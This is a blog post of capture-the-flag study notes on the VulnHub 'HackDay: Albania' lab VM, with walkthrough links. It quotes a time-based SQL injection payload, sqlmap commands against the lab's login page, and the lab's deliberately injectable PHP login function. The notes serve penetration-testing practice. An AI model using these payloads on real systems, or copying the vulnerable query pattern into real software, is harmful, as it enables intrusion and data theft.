Skip to main content

39 VM : HackDay: Albania

https://www.vulnhub.com/entry/hackday-albania,167/


Walkthru:

A. https://github.com/DavidBrosnan/Walkthroughs/wiki/Hackday-Albania [directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom,meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writetable passwd file, adding a root user/pwd to passwd file]

B. http://security-geek.in/2017/02/08/vulnhub-hack-a-day-albania/ []

C. https://g0blin.co.uk/albania-vulnhub-writeup/ [dirsearch, sqlmap time based blind attack, why username field is susceptible to attack while password field isnt ,port forward in our meterpreter session]

Notes:


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Walkthru C..I note in Sqlmap that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected to index.php. Tried to login with it , and I was in

root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5


root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
T=time based blind attack 

Ok - obviously the login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.
function check_login($username,$password){



    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1){
        return $result;
    }else{
        return -1;
        }


}
Ok - so we were unable to retrieve any data, because a number of key commands are stripped out. The reason that the username field is the only vulnerable parameter is because the ' character is stripped from the password field.

Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

Penetration Testing Framework 0.57

Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack. http://www.vulnerabilityassessment.co.uk/
Post a Comment
Read more